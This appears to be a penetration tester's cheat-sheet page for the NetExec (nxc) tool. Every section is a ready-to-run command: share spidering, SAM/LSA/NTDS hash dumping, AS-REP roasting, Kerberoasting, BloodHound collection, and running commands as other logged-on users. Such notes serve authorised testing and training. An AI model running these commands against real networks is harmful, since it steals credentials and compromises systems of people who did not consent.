# NetExec

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FRbfmSlNyA6i1G0LVCISB%2Fimage.avif?alt=media&#x26;token=6005d22b-989a-4dec-805d-bc45fc0f9a20" alt=""><figcaption></figcaption></figure>

NetExec (a.k.a. nxc) is a network service exploitation tool that helps automate assessing the security of *large* networks. It is based on CrackMapExec, so its usage will be familiar to CrackMapExec users.

Personally, I think the modules from NetExec make the tool worth using.

{% embed url="<https://www.netexec.wiki/>" %}

***

## SMB spidering shares

Spider and export all files from shares:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
```

List all readable files:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
```

## Dumping hashes

Dumping SAM:

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
```

Dumping LSA:

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
```

Dumping from NTDS.dit:

```
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
```

## BloodHound

If you have credentials, you can use nxc to collect a zip or .json files for BloodHound:

```
nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All
```

## AS-REP Roasting

For a single user:

```
nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
```

For a list of usernames in a file:

```
nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
```

## Kerberoasting

```
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
```

## SMB logged on users

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
```

## SMB active sessions

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
```

## SMB Execute commands on behalf of other users

```
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
```

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FsxHnFAZxoO0xv2Ff1wK9%2Fimage.avif?alt=media&#x26;token=f260e851-1db6-45dc-bff6-1b9a631755ed" alt=""><figcaption></figcaption></figure>
